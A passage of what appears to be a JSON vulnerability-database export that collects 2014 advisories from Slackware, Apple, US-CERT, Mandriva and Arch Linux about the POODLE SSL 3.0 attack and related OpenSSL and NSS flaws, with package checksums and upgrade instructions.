openssl-0.9.8zc-i486-1_slack13.1.txz\r\n5fe4e385b2251cfd7e8ae5963ec6cef1 openssl-solibs-0.9.8zc-i486-1_slack13.1.txz\r\n\r\nSlackware x86_64 13.1 packages:\r\n94feb6699d6f2cc7750a6b2e17ccaaa2 openssl-0.9.8zc-x86_64-1_slack13.1.txz\r\n2c17e4286509c29074ab0168367b851e openssl-solibs-0.9.8zc-x86_64-1_slack13.1.txz\r\n\r\nSlackware 13.37 packages:\r\n4483d91c776c7e23c59246c4e0aa24aa openssl-0.9.8zc-i486-1_slack13.37.txz\r\nfedd58eb19bc13c9dd88d947827a7370 openssl-solibs-0.9.8zc-i486-1_slack13.37.txz\r\n\r\nSlackware x86_64 13.37 packages:\r\n5d48ac1e9339efc35e304c7d48b2e762 openssl-0.9.8zc-x86_64-1_slack13.37.txz\r\n6f5e2b576259477c13f12cbed9be8804 openssl-solibs-0.9.8zc-x86_64-1_slack13.37.txz\r\n\r\nSlackware 14.0 packages:\r\n2b678160283bc696565dc8bd8b28c0eb openssl-1.0.1j-i486-1_slack14.0.txz\r\nf7762615c990713e9e86d4da962f1022 openssl-solibs-1.0.1j-i486-1_slack14.0.txz\r\n\r\nSlackware x86_64 14.0 packages:\r\n41010ca37d49b74e7d7dc3f1c6ddc57e openssl-1.0.1j-x86_64-1_slack14.0.txz\r\n40dc6f3de217279d6140c1efcc0d45c8 openssl-solibs-1.0.1j-x86_64-1_slack14.0.txz\r\n\r\nSlackware 14.1 packages:\r\n024ecea55e22e47f9fbb4b81a7b72a51 openssl-1.0.1j-i486-1_slack14.1.txz\r\n0a575668bb41ec4c2160800611f7f627 openssl-solibs-1.0.1j-i486-1_slack14.1.txz\r\n\r\nSlackware x86_64 14.1 packages:\r\nd07fe289f7998a584c2b0d9810a8b9aa openssl-1.0.1j-x86_64-1_slack14.1.txz\r\n1ffc5d0c02b0c60cefa5cf9189bfc71d openssl-solibs-1.0.1j-x86_64-1_slack14.1.txz\r\n\r\nSlackware -current packages:\r\n53c9f51a79460bbfc5dec5720317cd53 a/openssl-solibs-1.0.1j-i486-1.txz\r\ncc059aa63494f3b005a886c70bc3f5d6 n/openssl-1.0.1j-i486-1.txz\r\n\r\nSlackware x86_64 -current packages:\r\n500709555e652adcd84b4e02dfab4eeb a/openssl-solibs-1.0.1j-x86_64-1.txz\r\nc483ca9c450fa90a901ac013276ccc53 n/openssl-1.0.1j-x86_64-1.txz\r\n\r\n\r\nInstallation instructions:\r\n+------------------------+\r\n\r\nUpgrade the packages as root:\r\n# upgradepkg openssl-1.0.1j-i486-1_slack14.1.txz openssl-solibs-1.0.1j-i486-1_slack14.1.txz\r\n\r\n\r\n+-----+\r\n\r\nSlackware Linux Security Team\r\nhttp://slackware.com/gpg-key\r\nsecurity@slackware.com\r\n\r\n+------------------------------------------------------------------------+\r\n| To leave the slackware-security mailing list: |\r\n+------------------------------------------------------------------------+\r\n| Send an email to majordomo@slackware.com with this text in the body of |\r\n| the email message: |\r\n| |\r\n| unsubscribe slackware-security |\r\n| |\r\n| You will get a confirmation message back containing instructions to |\r\n| complete the process. Please do not reply to this email address. |\r\n+------------------------------------------------------------------------+\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niEYEARECAAYFAlQ+sX4ACgkQakRjwEAQIjMnYwCggSNccNsCi57a+p6F6/wBJNMr\r\nnjcAn08K5PJNtkMeLWV18epIMDLm+Vyg\r\n=7+DM\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-17T00:00:00", "title": "[slackware-security] openssl &#40;SSA:2014-288-01&#41;", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:54", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-10-17T00:00:00", "id": "SECURITYVULNS:DOC:31293", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31293", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:57", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31481", "https://vulners.com/securityvulns/securityvulns:doc:31305", "https://vulners.com/securityvulns/securityvulns:doc:31293"], "description": "Poodle attack. Protocol version downgrade to SSL 3.0. Memory leaks in SRTP and session tickets. Insufficient no-ssl3 protection. Data leakage via padding attack.", "edition": 1, "reporter": "BUGTRAQ", "published": "2014-12-09T00:00:00", "title": "OpenSSL multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:57", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "OpenSSL", "version": "1.0", "operator": "eq"}], "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568", "CVE-2014-8730"], "modified": "2014-12-09T00:00:00", "id": "SECURITYVULNS:VULN:14045", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14045", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:55", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2014-10-16-4 OS X Server v3.2.2\r\n\r\nOS X Server v3.2.2 is now available and addresses the following:\r\n\r\nServer\r\nAvailable for: OS X Mavericks v10.9.5 or later\r\nImpact: An attacker may be able to decrypt data protected by SSL\r\nDescription: There are known attacks on the confidentiality of SSL\r\n3.0 when a cipher suite uses a block cipher in CBC mode. An attacker\r\ncould force the use of SSL 3.0, even when the server would support a\r\nbetter TLS version, by blocking TLS 1.0 and higher connection\r\nattempts. This issue was addressed by disabling SSL 3.0 support in\r\nWeb Server, Calendar &amp; Contacts Server, and Remote Administration.\r\nCVE-ID\r\nCVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of\r\nGoogle Security Team\r\n\r\n\r\nOS X Server v3.2.2 may be obtained from the Mac App Store.\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple&#39;s Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.22 &#40;Darwin&#41;\r\nComment: GPGTools - http://gpgtools.org\r\n\r\niQIcBAEBAgAGBQJUQCJGAAoJEBcWfLTuOo7tyI0P/imLx5IYlrtwP9X6sCUaRNfa\r\ncjjI5T5ooRX1g83wc3sBGJnUaY5TYEpL8+aVdW0hL/Q8l+DCbvbTHDK1hcxNoPX7\r\nNsXgLFjKd56/mupWbx5beAjOA8Xey6F4tubYFNSppUEk0X9DKyVVmHNxPUnf/mTG\r\nF0opjTmLX9hJVsVvGGncBd24HxnkZJXvjd5Dfi+r/CBv1tFaL3ermZlnrba1cCaP\r\nmtZ06TAONykDYXN3GypSHZKedUIsMyQuuz+GDR2CC8Gw3P4sbbCfNkR2HNGFXPSt\r\nEG58UIdNqbbfDoTg3gR/u8e7XUrqQzSP/fq2lG1qraFpirodb67UKueVvOS1pqZQ\r\nHXJzLV5zSOx1GRLRp2hxQ7htILQGPE6alBnuqTKpe3cDxJ4h5HbZBdDIQNlLK2/y\r\nYxcCwt9AdmHr2BP2AmAE6X3jxTVbfCWxT+1ddTj+FX29DYRYSJHE4XTXAus6m4NI\r\n0uIVGv3OnmLA4r+7IGECQlMmPec0hkkWJV3otwIT83In1WMNlz85Q4Ypjo4jYfWW\r\nlEvnN15Pn8opiyHY62vPCufuroPklK1K6pIMIyFFJBGA2GVk1jqF9gNgIYqYwhMC\r\nmeaHWPu1wD82eRUBmTVHiNfKtqLx8MALBfp8uaklrfpnafrqxxuhS4ZjCEA0YU14\r\nNqlhvAS6z144pQkwp1dt\r\n=UMhr\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-18T00:00:00", "title": "APPLE-SA-2014-10-16-4 OS X Server v3.2.2", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:55", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-3566"], "modified": "2014-10-18T00:00:00", "id": "SECURITYVULNS:DOC:31301", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31301", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:55", "references": [], "description": "\r\n\r\nNCCIC / US-CERT\r\n\r\nNational Cyber Awareness System:\r\nTA14-290A: SSL 3.0 Protocol Vulnerability and POODLE Attack\r\n10/17/2014 12:27 PM EDT\r\n\r\nOriginal release date: October 17, 2014\r\nSystems Affected\r\n\r\nAll systems and applications utilizing the Secure Socket Layer &#40;SSL&#41; 3.0 with cipher-block chaining &#40;CBC&#41; mode ciphers may be vulnerable. However, the POODLE &#40;Padding Oracle On Downgraded Legacy Encryption&#41; attack demonstrates this vulnerability using web browsers and web servers, which is one of the most likely exploitation scenarios.\r\nOverview\r\n\r\nUS-CERT is aware of a design vulnerability found in the way SSL 3.0 handles block cipher mode padding. The POODLE attack demonstrates how an attacker can exploit this vulnerability to decrypt and extract information from inside an encrypted transaction.\r\nDescription\r\n\r\nThe SSL 3.0 vulnerability stems from the way blocks of data are encrypted under a specific type of encryption algorithm within the SSL protocol. The POODLE attack takes advantage of the protocol version negotiation feature built into SSL/TLS to force the use of SSL 3.0 and then leverages this new vulnerability to decrypt select content within the SSL session. The decryption is done byte by byte and will generate a large number of connections between the client and server.\r\n\r\nWhile SSL 3.0 is an old encryption standard and has generally been replaced by Transport Layer Security &#40;TLS&#41; &#40;which is not vulnerable in this way&#41;, most SSL/TLS implementations remain backwards compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience. Even if a client and server both support a version of TLS the SSL/TLS protocol suite allows for protocol version negotiation &#40;being referred to as the \u201cdowngrade dance\u201d in other reporting&#41;. The POODLE attack leverages the fact that when a secure connection attempt fails, servers will fall back to older protocols such as SSL 3.0. An attacker who can trigger a connection failure can then force the use of SSL 3.0 and attempt the new attack. [1]\r\n\r\nTwo other conditions must be met to successfully execute the POODLE attack: 1&#41; the attacker must be able to control portions of the client side of the SSL connection &#40;varying the length of the input&#41; and 2&#41; the attacker must have visibility of the resulting ciphertext. The most common way to achieve these conditions would be to act as Man-in-the-Middle &#40;MITM&#41;, requiring a whole separate form of attack to establish that level of access.\r\n\r\nThese conditions make successful exploitation somewhat difficult. Environments that are already at above-average risk for MITM attacks &#40;such as public WiFi&#41; remove some of those challenges.\r\nImpact\r\n\r\nThe POODLE attack can be used against any system or application that supports SSL 3.0 with CBC mode ciphers. This affects most current browsers and websites, but also includes any software that either references a vulnerable SSL/TLS library &#40;e.g. OpenSSL&#41; or implements the SSL/TLS protocol suite itself. By exploiting this vulnerability in a likely web-based scenario, an attacker can gain access to sensitive data passed within the encrypted web session, such as passwords, cookies and other authentication tokens that can then be used to gain more complete access to a website &#40;impersonating that user, accessing database content, etc.&#41;.\r\nSolution\r\n\r\nThere is currently no fix for the vulnerability SSL 3.0 itself, as the issue is fundamental to the protocol; however, disabling SSL 3.0 support in system/application configurations is the most viable solution currently available.\r\n\r\nSome of the same researchers that discovered the vulnerability also developed a fix for one of the prerequisite conditions; TLS_FALLBACK_SCSV is a protocol extension that prevents MITM attackers from being able to force a protocol downgrade. OpenSSL has added support for TLS_FALLBACK_SCSV to their latest versions and recommend the following upgrades: [2]\r\n\r\n OpenSSL 1.0.1 users should upgrade to 1.0.1j.\r\n OpenSSL 1.0.0 users should upgrade to 1.0.0o.\r\n OpenSSL 0.9.8 users should upgrade to 0.9.8zc.\r\n\r\nBoth clients and servers need to support TLS_FALLBACK_SCSV to prevent downgrade attacks.\r\n\r\nOther SSL 3.0 implementations are most likely also affected by POODLE. Contact your vendor for details. Additional vendor information may be available in the National Vulnerability Database &#40;NVD&#41; entry for CVE-2014-3566. [3]\r\nReferences\r\n\r\n [1] This Poodle Bites: Exploiting The SSL Fallback\r\n [2] OpenSSL Security Advisory [15 Oct 2014]\r\n [3] Vulnerability Summary for CVE-2014-3566\r\n\r\nRevision History\r\n\r\n October 17, 2014 Initial Release\r\n\r\nThis product is provided subject to this Notification and this Privacy &amp; Use policy.\r\nOTHER RESOURCES:\r\nContact Us | Security Publications | Alerts and Tips | Related Resources\r\nSTAY CONNECTED:\r\n\r\nSUBSCRIBER SERVICES:\r\nManage Preferences | Unsubscribe | Help\r\nThis email was sent to 3apa3a@security.nnov.ru using GovDelivery, on behalf of: United States Computer Emergency Readiness Team &#40;US-CERT&#41; \u00b7 245 Murray Lane SW Bldg 410 \u00b7 Washington, DC 20598 \u00b7 &#40;703&#41; 235-5110 \t\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-18T00:00:00", "title": "TA14-290A: SSL 3.0 Protocol Vulnerability and POODLE Attack", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:55", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-3566"], "modified": "2014-10-18T00:00:00", "id": "SECURITYVULNS:DOC:31305", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31305", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:55", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2014-10-16-2 Security Update 2014-005\r\n\r\nSecurity Update 2014-005 is now available and addresses the\r\nfollowing:\r\n\r\nSecure Transport\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5\r\nImpact: An attacker may be able to decrypt data protected by SSL\r\nDescription: There are known attacks on the confidentiality of SSL\r\n3.0 when a cipher suite uses a block cipher in CBC mode. An attacker\r\ncould force the use of SSL 3.0, even when the server would support a\r\nbetter TLS version, by blocking TLS 1.0 and higher connection\r\nattempts. This issue was addressed by disabling CBC cipher suites\r\nwhen TLS connection attempts fail.\r\nCVE-ID\r\nCVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of\r\nGoogle Security Team\r\n\r\nNote: Security Update 2014-005 includes the security content of\r\nOS X bash Update 1.0. For further details see\r\nhttps://support.apple.com/kb/HT6495\r\n\r\n\r\nSecurity Update 2014-005 may be obtained from the Mac App Store or\r\nApple&#39;s Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple&#39;s Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.22 &#40;Darwin&#41;\r\nComment: GPGTools - http://gpgtools.org\r\n\r\niQIcBAEBAgAGBQJUQCI2AAoJEBcWfLTuOo7t5ygP/0l9VIBlR7Q6ocMRSB61+2uN\r\nadB6UoEcmJCkUwmEAWOlVT0GlrtV+h2FbQGSKAkiDK5b7+E9UfX8UXneyaV4MWbj\r\nBFDVFt/R0RRYpuojfmhNvMP+p7TFA1QsaHAUrWBtBomJ1+326YIhXBtWMIbVRGHC\r\nS4OZgVbwSnyeJ3o74ftr+CcMu9PFXOMDj0Sdv6rb5af9vkNjfocp8J4El2psr3fO\r\nAri7bJNSQL2D2ZeGxR7aYu8JMdKQ7N0vnF/c24/z7zd3AgoLQLXsg6F0wI45vRNi\r\nPxvmIAJ217qOva/4XRwve/YdxlpmYRwpkTXTDn7nMyTXsrtUm4PVumxKJJEScYmc\r\nbU9Ckw1CUEQdcd883aB0NgLkf5LTPzsih+ak6xRzElp3QbmnPQ2y0GrnwryXQgLI\r\nKEFrhFCkru7RPaPhXGpeqNB25iT99Rp6rc1w/LvhhZiEArBKyVwdWPAwt4ZAMBQY\r\nUKZYYi6rQKEf+Tf5REoUv9OZCQFYFiuK6/5J/mAcKsZUN6+hxFRrNeq3Kg4GNMnS\r\nv8T8Z0Z5IXbDBdptF6aSYI3sQYkvHob4ujAKxSLFJk9WJOl6y3/TIwGN5eTRxA0K\r\nI+ZXxp9H0tDyHwIgGw/d9FWeW56mTqlcln5M5+V2jphi1h/0EqK70YpBnq4D/tI2\r\nvDl+zNHL/d2D8rWh8csq\r\n=c286\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-18T00:00:00", "title": "APPLE-SA-2014-10-16-2 Security Update 2014-005", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:55", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-3566"], "modified": "2014-10-18T00:00:00", "id": "SECURITYVULNS:DOC:31303", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31303", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:55", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2014-10-16-5 OS X Server v2.2.5\r\n\r\nOS X Server v2.2.5 is now available and addresses the following:\r\n\r\nServer\r\nAvailable for: OS X Mountain Lion v10.8.5\r\nImpact: An attacker may be able to decrypt data protected by SSL\r\nDescription: There are known attacks on the confidentiality of SSL\r\n3.0 when a cipher suite uses a block cipher in CBC mode. An attacker\r\ncould force the use of SSL 3.0, even when the server would support a\r\nbetter TLS version, by blocking TLS 1.0 and higher connection\r\nattempts. This issue was addressed by disabling SSL 3.0 support in\r\nWeb Server, Calendar &amp; Contacts Server, and Remote Administration.\r\nCVE-ID\r\nCVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of\r\nGoogle Security Team\r\n\r\n\r\nOS X Server v2.2.5 may be obtained from the Mac App Store.\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple&#39;s Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.22 &#40;Darwin&#41;\r\nComment: GPGTools - http://gpgtools.org\r\n\r\niQIbBAEBAgAGBQJUQCKNAAoJEBcWfLTuOo7tl5UP90cGp+wElIUvSYZIlSHZdaPZ\r\nYxKFiIjLj4eGUF4b79vQweQtwQiqMUKh0F9qZZ7QlOimNhBrhZvwjRx/aD8LePhS\r\nKhNRH8I2YPK32vws4ufojFZvjuL+Zs2RwQ/1nPgf/STJ5wHQLQolfkh+HKaED+cz\r\nYg36da7tZ0uEcWvUbWEnq0Ewz+DUF4UffhVLIbmuC0HdmGMEuGoFdhU0+zsTZmcH\r\nYhFfQwsZX/xbTwyMWH0k1hhS1w9QyoNnhC9CbQBmjv6CYuW/6MuksONesfL10oVL\r\nu9fxSzuGchv/iHZQ60UE5d+H7e1lWvl/Baw065w5Ie2bx/YEevvkda2pA/LnQSea\r\nrbFlykfOuBLR47Eg7MalBSJxkO87en1ASyz9oLKTErYm/AjYI22Xq/e2kmst4UW4\r\n24t7iNdNJzp4SQyvS2kUW9T4P2PGV16zkv5fUELYK/uFejaQ8LoF3t+LpMiluibf\r\nnKYJbdsF/14xDygG5fL5KBOYL/cPFXlradykKgZnWhkflJYKzHp05u2ILI+Stv+V\r\nBaniDoMTn53OBT875/xTKmv3igbkwU5YIrJLsNZRCnFchlP0bAWixjiqSqcs6f6j\r\nio+/R05z0IPi6FE05cCi8CH2wMunrwgh3HhSCTiXl12vt3DXSBrmMuDyRLqGxEC4\r\n93VoWCgAlgjlfdjjI40=\r\n=tAhs\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-18T00:00:00", "title": "APPLE-SA-2014-10-16-5 OS X Server v2.2.5", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:55", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-3566"], "modified": "2014-10-18T00:00:00", "id": "SECURITYVULNS:DOC:31302", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31302", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:56", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:252\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : nss\r\n Date : December 15, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated nss packages fix security vulnerabilities:\r\n \r\n In the QuickDER decoder in NSS before 3.17.3, ASN.1 DER decoding of\r\n lengths is too permissive, allowing undetected smuggling of arbitrary\r\n data &#40;CVE-2014-1569&#41;.\r\n \r\n This update adds support for the TLS Fallback Signaling Cipher Suite\r\n Value &#40;TLS_FALLBACK_SCSV&#41; in NSS, which can be used to prevent protocol\r\n downgrade attacks against applications which re-connect using a lower\r\n SSL/TLS protocol version when the initial connection indicating the\r\n highest supported protocol version fails. This can prevent a forceful\r\n downgrade of the communication to SSL 3.0, mitigating CVE-2014-3566,\r\n also known as POODLE. SSL 3.0 support has also been disabled by\r\n default in this Firefox and Thunderbird update, further mitigating\r\n POODLE.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1569\r\n http://advisories.mageia.org/MGASA-2014-0507.html\r\n https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.3_release_notes\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n fc10a003360b8afb464df7b305c18127 mbs1/x86_64/lib64nss3-3.17.3-1.mbs1.x86_64.rpm\r\n d905a80bfbca9dfe020ca223b4778e61 mbs1/x86_64/lib64nss-devel-3.17.3-1.mbs1.x86_64.rpm\r\n 8fc7041f46189c8c0c89db593ee5da11 mbs1/x86_64/lib64nss-static-devel-3.17.3-1.mbs1.x86_64.rpm\r\n fbdbd1016983804aecd74764b106642b mbs1/x86_64/nss-3.17.3-1.mbs1.x86_64.rpm\r\n 7c0c88abd44a83fb87304d677977e183 mbs1/x86_64/nss-doc-3.17.3-1.mbs1.noarch.rpm\r\n ef3f32df47bcf9ced2ecb14b5bcd1439 mbs1/x86_64/rootcerts-20141117.00-1.mbs1.x86_64.rpm\r\n b7b5939180d3f43310e1ee31e11bf087 mbs1/x86_64/rootcerts-java-20141117.00-1.mbs1.x86_64.rpm \r\n cdd11c0294e9c4dc54a896cd3e4c6170 mbs1/SRPMS/nss-3.17.3-1.mbs1.src.rpm\r\n f5e57b2f9ff644f36a26e2c80759accc mbs1/SRPMS/rootcerts-20141117.00-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFUjrQDmqjQ0CJFipgRAiUvAJ9meLgw3zNCQfXMfIO4VWcIwFqrKACglVBu\r\n6kKTP01FwHyn4dFFz1WDHRU=\r\n=k8XV\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-12-22T00:00:00", "title": "[ MDVSA-2014:252 ] nss", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:56", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-3566", "CVE-2014-1569"], "modified": "2014-12-22T00:00:00", "id": "SECURITYVULNS:DOC:31532", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31532", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:57", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31318"], "description": "Unauthorized bluetooth pairing, SSL poodle attack.", "edition": 1, "reporter": "BUGTRAQ", "published": "2014-10-27T00:00:00", "title": "Apple TV security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:57", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Apple TV", "version": "7.0", "operator": "eq"}], "cvelist": ["CVE-2014-3566", "CVE-2014-4428"], "modified": "2014-10-27T00:00:00", "id": "SECURITYVULNS:VULN:14063", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14063", "cvss": {"score": 5.4, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:42", "references": ["http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3513", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3567", "https://www.openssl.org/~bodo/ssl-poodle.pdf", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3568", "https://www.openssl.org/news/secadv_20141015.txt", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566"], "affectedPackage": [{"OS": "any", "OSVersion": "any", "packageVersion": "1.0.1.j-1", "packageName": "openssl", "arch": "any", "packageFilename": "UNKNOWN", "operator": "lt"}], "edition": 1, "description": "SRTP Memory Leak (CVE-2014-3513)\n--------------------------------\n\nA flaw in the DTLS SRTP extension parsing code allows an attacker, who\nsends a carefully crafted handshake message, to cause OpenSSL to fail\nto free up to 64k of memory causing a memory leak. This could be\nexploited in a Denial Of Service attack. This issue affects OpenSSL\n1.0.1 server implementations for both SSL/TLS and DTLS regardless of\nwhether SRTP is used or configured. Implementations of OpenSSL that\nhave been compiled with OPENSSL_NO_SRTP defined are not affected.\n\nSession Ticket Memory Leak (CVE-2014-3567)\n------------------------------------------\n\nWhen an OpenSSL SSL/TLS/DTLS server receives a session ticket the\nintegrity of that ticket is first verified. In the event of a session\nticket integrity check failing, OpenSSL will fail to free memory\ncausing a memory leak. By sending a large number of invalid session\ntickets an attacker could exploit this issue in a Denial Of Service\nattack.\n\nBuild option no-ssl3 is incomplete (CVE-2014-3568)\n--------------------------------------------------\n\nWhen OpenSSL is configured with &quot;no-ssl3&quot; as a build option, servers\ncould accept and complete a SSL 3.0 handshake, and clients could be\nconfigured to send them.\n\nSSL 3.0 Fallback protection\n---------------------------\n\nOpenSSL has added support for TLS_FALLBACK_SCSV to allow applications\nto block the ability for a MITM attacker to force a protocol\ndowngrade.\n\nSome client applications (such as browsers) will reconnect using a\ndowngraded protocol to work around interoperability bugs in older\nservers. This could be exploited by an active man-in-the-middle to\ndowngrade connections to SSL 3.0 even if both sides of the connection\nsupport higher protocols. SSL 3.0 contains a number of weaknesses\nincluding POODLE (CVE-2014-3566).", "reporter": "Arch Linux", "published": "2014-10-16T00:00:00", "title": "openssl: denial of service / man-in-the-middle / poodle mitigation", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "archlinux", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-10-16T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-October/000117.html", "id": "ASA-201410-6", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T18:44:48", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=1064670", "https://bugs.archlinux.org/task/42760", "https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.3_release_notes", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1569", "https://hg.mozilla.org/projects/nss/rev/e9a7991380db"], "affectedPackage": [{"OS": "any", "OSVersion": "any", "packageVersion": "3.17.3-1", "packageFilename": "UNKNOWN", "packageName": "nss", "arch": "any", "operator": "lt"}], "edition": 